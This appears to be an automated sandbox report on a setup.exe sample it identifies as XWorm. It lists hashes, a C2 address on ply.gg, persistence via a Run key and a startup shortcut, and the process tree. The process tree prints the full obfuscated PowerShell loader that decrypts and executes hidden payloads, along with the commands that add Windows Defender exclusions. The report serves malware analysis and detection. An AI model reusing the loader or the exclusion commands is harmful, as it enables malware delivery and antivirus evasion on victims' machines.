Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
124s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 21:33
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win10v2004-20240709-en
General
-
Target
setup.exe
-
Size
356KB
-
MD5
5783316be9eff4cebc0fedee80500e9d
-
SHA1
61b5d82d9da372c011ae2bbe050ecc47cd8a7da5
-
SHA256
a3959e3a8458fe1a3530b5866f7e970700cf156fc0b5f7ff015313fe62c984a5
-
SHA512
53c3f6768358f19bcdce131d050685f3bfc260a96fbc8963390361942c524456b286efb3b2af0c612e36f76d9e1e51aa28f9b81c09d58bb15e60109a63c52513
-
SSDEEP
6144:EhEN7+GRIGuXQs3frbL7rbL7rbL7rWG2mWG2mWG2mWG2mJ5pZJ5pZJ5pZJ7p0yNI:EG7dy90hSyWoYchYlVgFDuy+6
Malware Config
Extracted
xworm
127.0.0.1:48802
those-situation.gl.at.ply.gg:48802
-
Install_directory
%AppData%
-
install_file
x4host.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2392-28-0x0000000007280000-0x0000000007298000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 16 2392 powershell.exe 34 2392 powershell.exe 40 2392 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2392 powershell.exe 452 powershell.exe 1464 powershell.exe 4644 powershell.exe 4328 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4host.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4host.lnk powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4host = "C:\\Users\\Admin\\AppData\\Roaming\\x4host.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2392 powershell.exe 2392 powershell.exe 452 powershell.exe 452 powershell.exe 1464 powershell.exe 1464 powershell.exe 4644 powershell.exe 4644 powershell.exe 4328 powershell.exe 4328 powershell.exe 2392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 452 powershell.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2392 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1068 wrote to memory of 2936 1068 setup.exe 86 PID 1068 wrote to memory of 2936 1068 setup.exe 86 PID 1068 wrote to memory of 2936 1068 setup.exe 86 PID 2936 wrote to memory of 2392 2936 cmd.exe 88 PID 2936 wrote to memory of 2392 2936 cmd.exe 88 PID 2936 wrote to memory of 2392 2936 cmd.exe 88 PID 2392 wrote to memory of 452 2392 powershell.exe 90 PID 2392 wrote to memory of 452 2392 powershell.exe 90 PID 2392 wrote to memory of 452 2392 powershell.exe 90 PID 2392 wrote to memory of 1464 2392 powershell.exe 92 PID 2392 wrote to memory of 1464 2392 powershell.exe 92 PID 2392 wrote to memory of 1464 2392 powershell.exe 92 PID 2392 wrote to memory of 4644 2392 powershell.exe 94 PID 2392 wrote to memory of 4644 2392 powershell.exe 94 PID 2392 wrote to memory of 4644 2392 powershell.exe 94 PID 2392 wrote to memory of 4328 2392 powershell.exe 96 PID 2392 wrote to memory of 4328 2392 powershell.exe 96 PID 2392 wrote to memory of 4328 2392 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\cmd.execmd /c nitrogenerator.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UH/fwSN0PyJWF9gmCa0rqlchsQbW6Xom1tbi76SAsl8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+aIshcp+X8HCUI4eH6i5ug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oywQV=New-Object System.IO.MemoryStream(,$param_var); $jMsno=New-Object System.IO.MemoryStream; $pQPHW=New-Object System.IO.Compression.GZipStream($oywQV, [IO.Compression.CompressionMode]::Decompress); $pQPHW.CopyTo($jMsno); $pQPHW.Dispose(); $oywQV.Dispose(); $jMsno.Dispose(); $jMsno.ToArray();}function execute_function($param_var,$param2_var){ $JJuGC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lCOec=$JJuGC.EntryPoint; $lCOec.Invoke($null, $param2_var);}$uoxMw = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nitrogenerator.bat';$host.UI.RawUI.WindowTitle = $uoxMw;$pLlrs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uoxMw).Split([Environment]::NewLine);foreach ($IZJzW in $pLlrs) { if ($IZJzW.StartsWith(':: ')) { $tvpGf=$IZJzW.Substring(3); break; }}$payloads_var=[string[]]$tvpGf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4host.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4host.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
18KB
MD559fe1c45f8cff9ab11f90bd31e62ecbe
SHA187de959e2ed82420bfcc068d9449680b83fdd7f4
SHA256da36aa1e1299f74f1c7f7c3f3687d04e9ec5e77ac6ebc8390fd8ac770a13eb9c
SHA51208fe84204323aa7784cac3f65b5b95fa089695539b46a84da02cfb2fa0c87cb09e89525fc5f97d8fc74ccffd0f657472898d2c4783a7e42d936310c169fb6551
-
Filesize
18KB
MD5dca67ac58ac1d809524d2224b84cd194
SHA10914d077831e378662d3e01166256e73a2f4435d
SHA25618e67379fa3c167a25e346d56ee058d366230866cd76b210371b2199f0f4e328
SHA5121335358af1433d12a1cbfe8820a50d99eb1dab88c9c8b860ba9922f7b765110d1894809d0cfebb16761b76928735882aeded4da6528cdd32e4884d885f826413
-
Filesize
18KB
MD5fc65e5326854115833efe603b0c34c52
SHA196e1227d8f7fd38b49d0def1dc092b307c032656
SHA256e54604967bb0da55da38c749d86d08d5844cc1b8f477f01ab75dfa218217c90e
SHA5121e3493cc5e80f1c56ae0941f6759f08f392e8599c74e39eca62adc120ec5f714c9de3bfd6dd996636c397e45b77221c80e4f802e0393703afc5e51dd66dbc95f
-
Filesize
296KB
MD5907e9fc6911129b0a47c7d86d7f7f9d8
SHA1685dfd20c4e49dbb6f6aad11b58c97ab0162e8bc
SHA256c149c689139cacc133cf0718188cbedc9fe0be449297a71f1c5a18255bdfac2a
SHA51207a1239ded8379d48dee4cfef74e9496c090ecc4b8efae0bb26fafbebc58736be0e69f7b9ded184da058e282f0f8a0c69060c60ae8ab870cc1d68aee328713ee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82